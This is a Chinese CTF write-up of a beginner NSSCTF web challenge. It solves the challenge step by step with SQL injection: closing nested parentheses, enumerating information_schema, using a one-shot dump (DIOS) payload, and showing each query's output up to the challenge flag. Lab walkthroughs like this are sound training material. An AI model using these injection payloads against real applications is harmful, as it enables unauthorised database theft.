NSSCTF入门题单[LitCTF 2023]WriteUP-NSSCTF-3868
North-Glory 2024-11-27
CTF
NSSCTF
WriteUP
[LitCTF 2023]这套题是Web方向入门题单,这是我的第19题
- 题单【传送门 (opens new window)】
- 主办方WriteUP【传送门 (opens new window)】
- 主办方WriteUP视频【传送门 (opens new window)】
| 题目编号 | 题目名称 | 题目方向 | 难度 |
|---|---|---|---|
| 3868 | 这是什么?SQL !注一下 ! | Web | 1 |
# 题目19:这是什么?SQL !注一下 !
# 题目描述:为了安全起见多带了几个套罢了o(////▽////)q
# 考点1:SQL注入
# 考点2:白盒
# 方法1:手工注入,逐个注入
进入靶场,我们可以看到页面中的提示,左下角可以看到白盒页面,是用php写的SQL查询,查询语句多了几层括号
我们的思路是先闭合括号,然后用注释符号注释掉后边的括号,我们就能在中间执行对应的SQL语句,语句最后是如下形式的
SELECT username,password FROM users WHERE id = ((((((1)))))) ANY --+))))))
1
我们使用HackBar进行辅助SQL注入,我们打开F12控制台,切换到HackBar,题目给出了提示的列名是username和password两个,我们可以使用HackBar自带的预处理语句进行注入:
这里我们选择第一个,Dump all database name,也就是爆破所有库名
我们有username和password两列,所以the number of columns需要填2
然后Output positions填1的情况返回值如下
Executed Operations:
SELECT username,password FROM users WHERE id = ((((((11)))))) union select group_concat(schema_name),2 from information_schema.schemata -- ))))))))))))
Array ( [0] => Array ( [username] => information_schema,mysql,ctftraining,performance_schema,test,ctf [password] => 2 ) )
1
2
3
4
2
3
4
然后Output positions填2的情况返回值如下
Executed Operations:
SELECT username,password FROM users WHERE id = ((((((11)))))) union select 1,group_concat(schema_name) from information_schema.schemata -- ))))))))))))
Array ( [0] => Array ( [username] => 1 [password] => information_schema,mysql,ctftraining,performance_schema,test,ctf ) )
1
2
3
4
2
3
4
我们怀疑是在ctftraining、test、ctf这三个库最有可能存放flag,所以我们去爆这三个库的表名
把union的部分都删掉,换成爆破表名的部分,选择Dump tables from database
-- 默认是database()
http://node5.anna.nssctf.cn:22679/?id=11)))))) union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+))))))
-- 我们手动选择库名
http://node5.anna.nssctf.cn:22679/?id=11)))))) union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctftraining' --+))))))
1
2
3
4
2
3
4
执行之后,我们得到如下结果
Executed Operations:
SELECT username,password FROM users WHERE id = ((((((11)))))) union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctftraining' -- ))))))))))))
Array ( [0] => Array ( [username] => 1 [password] => flag,news,users ) )
1
2
3
4
2
3
4
下一步我们爆表里面的字段名:
我们在HackBar的SQLI选项里选择MySQL,然后选择Dump columns from database,然后将库名替换为ctftraining
http://node5.anna.nssctf.cn:22679/?id=11)))))) union select 1,group_concat(column_name) from information_schema.columns where table_schema='ctftraining' --+))))))
1
执行之后,我们得到如下结果
Executed Operations:
SELECT username,password FROM users WHERE id = ((((((11)))))) union select 1,group_concat(column_name) from information_schema.columns where table_schema='ctftraining' -- ))))))))))))
Array ( [0] => Array ( [username] => 1 [password] => flag,id,title,content,time,id,username,password,ip,time ) )
1
2
3
4
2
3
4
最后我们使用联合查询的方式,直接将flag这个字段的值拿出来
http://node5.anna.nssctf.cn:22679/?id=11)))))) union select 1,flag from ctftraining.flag --+))))))
1
这句话的意思是,我们查询ctftraining库下的flag表的flag字段
Executed Operations:
SELECT username,password FROM users WHERE id = ((((((11)))))) union select 1,flag from ctftraining.flag -- ))))))))))))
Array ( [0] => Array ( [username] => 1 [password] => NSSCTF{6090c84c-7585-4fb7-989d-598b04e7ba82} ) )
1
2
3
4
2
3
4
# 方法2:手工注入 DIOS(Dump in one shot)
我们除了第一种的方法,先爆破库名,然后爆破表名,然后爆破列名,最后用列名做查询。我们还可以使用一波流,直接将整个库都拿下来,具体方法如下
选择Dump in one shot,会生成HackBar的预处理语句(需要注意生成的这句话是一个列名,需要和1对齐),我们直接点运行
http://node5.anna.nssctf.cn:22679/?id=11)))))) union select 1,
(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)
--+))))))
1
2
3
4
5
2
3
4
5
此时得到的回显会很长,我们需要筛查其中的内容,找到flag这个表和flag的flag字段
Executed Operations:
SELECT username,password FROM users WHERE id = ((((((11)))))) union select 1,(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a) -- ))))))))))))
---内容仅展示部分
Array ( [0] => Array ( [username] => 1 [password] => [ information_schema ] > ALL_PLUGINS > PLUGIN_NAME| [ information_schema ] > ALL_PLUGINS > PLUGIN_VERSION| [ information_schema ] > ALL_PLUGINS > PLUGIN_STATUS| [ information_schema ] > ALL_PLUGINS > PLUGIN_TYPE| [ information_schema ] > ALL_PLUGINS > PLUGIN_TYPE_VERSION| [ information_schema ] > ALL_PLUGINS > PLUGIN_LIBRARY| [ information_schema ] > ALL_PLUGINS > PLUGIN_LIBRARY_VERSION| [ information_schema ] > ALL_PLUGINS > PLUGIN_AUTHOR| [ information_schema ] > ALL_PLUGINS > PLUGIN_DESCRIPTION| [ information_schema ] > ALL_PLUGINS > PLUGIN_LICENSE| [ information_schema ] > ALL_PLUGINS > LOAD_OPTION| [ information_schema ] > ALL_PLUGINS > PLUGIN_MATURITY| [ information_schema ] > ALL_PLUGINS > PLUGIN_AUTH_VERSION| [ information_schema ] > APPLICABLE_ROLES > GRANTEE| [ information_schema ] > APPLICABLE_ROLES > ROLE_NAME| [ information_schema ] > APPLICABLE_ROLES > IS_GRANTABLE| [ information_schema ] > APPLICABLE_ROLES > IS_DEFAULT| [ information_schema ] > CHARACTER_SETS > CHARACTER_SET_NAME| [ information_schema ] > CHARACTER_SETS > DEFAULT_COLLATE_NAME| [ information_schema ] > CHARACTER_SETS > DESCRIPTION| [ information_schema ] > CHARACTER_SETS > MAXLEN| [ information_schema ] > CHECK_CONSTRAINTS > CONSTRAINT_CATALOG| [ information_schema ] > CHECK_CONSTRAINTS > CONSTRAINT_SCHEMA| [ information_schema ] > CHECK_CONSTRAINTS > TABLE_NAME| [ information_schema ] > CHECK_CONSTRAINTS > CONSTRAINT_NAME| [ information_schema ] > CHECK_CONSTRAINTS > CHECK_CLAUSE| [ information_schema ] > COLLATIONS > COLLATION_NAME| [ information_schema ] > COLLATIONS > CHARACTER_SET_NAME| [ information_schema ] > COLLATIONS > ID| [
1
2
3
4
5
6
2
3
4
5
6
最后我们使用联合查询的方式,直接将flag这个字段的值拿出来
http://node5.anna.nssctf.cn:22679/?id=11)))))) union select 1,flag from ctftraining.flag --+))))))
1
# 彩蛋:输入2,然后执行
Executed Operations:
SELECT username,password FROM users WHERE id = ((((((2))))))
Array ( [0] => Array ( [username] => fake_flag [password] => F1rst_to_Th3_eggggggggg!} (4/4) ) )
1
2
3
4
2
3
4
